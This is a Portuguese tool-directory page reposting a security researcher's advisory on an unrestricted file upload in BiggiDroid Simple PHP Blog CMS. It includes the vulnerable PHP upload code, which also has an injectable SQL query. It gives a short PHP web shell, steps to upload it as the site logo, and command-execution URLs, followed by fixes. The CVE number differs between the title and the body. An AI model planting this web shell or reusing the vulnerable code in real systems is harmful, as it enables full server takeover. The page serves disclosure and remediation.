Diretório de Ferramentas
Categorias
RCE-Simplephpblog-biggiedroid — CVE-2025-15497 - Upload Arbitrário de Arquivo Levando à Execução Remota de Código (RCE) | Kitploit
Ferramentas / GitHub / asim-qazi / rce-simplephpblog-biggiedroid
asim-qazi/rce-simplephpblog-biggiedroid RCE-Simplephpblog-biggiedroid CVE-2025-15497 - Upload Arbitrário de Arquivo Levando à Execução Remota de Código (RCE)
Descubra as ferramentas mais usadas pela nossa comunidade.
Últimos 7 Dias Últimos 30 Dias
9 há 8 mesesCVE-2025-15495 - Upload Arbitrário de Ficheiros Levando à Execução Remota de Código (RCE)
Produto
BiggiDroid – Simple PHP Blog CMS
Página do produto: https://biggidroid.com/product/simple-php-blog/
Tipo de Vulnerabilidade
Upload Arbitrário de Ficheiros
Upload Irrestrito de Ficheiros
Execução Remota de Código (RCE)
Gravidade
Crítica
CVSS (Estimado): 9.8 (AV:N / AC:L / PR:L / UI:N / S:U / C:H / I:H / A:H)
Sumário
O Simple PHP Blog CMS contém uma vulnerabilidade de upload irrestrito de ficheiros na funcionalidade de upload do Logótipo do Site no painel de administração.
Um atacante autenticado pode carregar um ficheiro PHP malicioso disfarçado de imagem, que é armazenado num diretório acessível pela web e executado pelo servidor, resultando em execução remota de comandos .
Componente Afetado
Painel de Administração → Atualizar Logótipo do Site
Excerto de código vulnerável relevante:
$target = "../image/".basename($_FILES['image']['name']);
$image = $_FILES['image']['name'];
$query = mysqli_query($con,
"UPDATE sitedetails SET sitelogo='$image' WHERE id='$id'");
if (move_uploaded_file($_FILES['image']['tmp_name'], $target)) {
// sucesso
}
Problemas
Nenhuma validação de extensão de ficheiro
Nenhuma validação de tipo MIME
Nenhuma verificação de conteúdo do ficheiro no servidor
Prova de Conceito (PoC)
Criar um Ficheiro PHP Malicioso Crie um ficheiro chamado shell.php:
<?php
$cmd = $_GET['cmd'] ?? '';
echo "<pre>";
system($cmd);
echo "</pre>";
?>
Carregar o Ficheiro via Painel de Administração
Faça login no painel de administração
Navegue para Logótipo do Site → Atualizar Logótipo
Carregue o shell.php como ficheiro de logótipo
Submeta o formulário
📌 A aplicação aceita o ficheiro PHP sem validação
Aceder à Web Shell Carregada Após o upload, o ficheiro está acessível em:
http://127.0.0.1/image/shell.php
Execute comandos do sistema:
http://127.0.0.1/image/shell.php?cmd=dir
Execução de Comando Bem-sucedida O servidor executa comandos do SO e retorna a saída, confirmando Execução Remota de Código .
Prova de Conceito
Página do Produto
Carregar Shell a partir desta localização.
Shell PHP
Execução Remota de Código
Código Vulnerável
Impacto
Executar comandos arbitrários do SO
Ler ficheiros de configuração sensíveis
Modificar ou eliminar dados da aplicação
Carregar backdoors persistentes
Comprometer completamente o servidor de alojamento
Esta vulnerabilidade pode levar à tomada total do servidor .
Análise da Causa Raiz
Falta de lista de permissões de extensões de ficheiro
Nenhuma imposição de tipo MIME
Uso direto do nome de ficheiro fornecido pelo utilizador
Diretório de upload permite execução de PHP
Nenhum .htaccess / hardening do servidor
✅ Correções Recomendadas
Restringir extensões de ficheiro
$allowed = ['jpg','jpeg','png','gif'];
Validar tipo MIME
Renomear ficheiros carregados
Usar UUIDs aleatórios
Nunca confiar em nomes de ficheiro fornecidos pelo utilizador
📚 Referências
OWASP Unrestricted File Upload
CWE-434: Unrestricted Upload of File with Dangerous Type
OWASP Top 10 – A03: Injection
🧑💻 Descoberto Por
Mo Asim também conhecido como Asim Qazi
Github: @Asim-Qazi
Linkedin: Asim Qazi
Estudante | Investigador de Segurança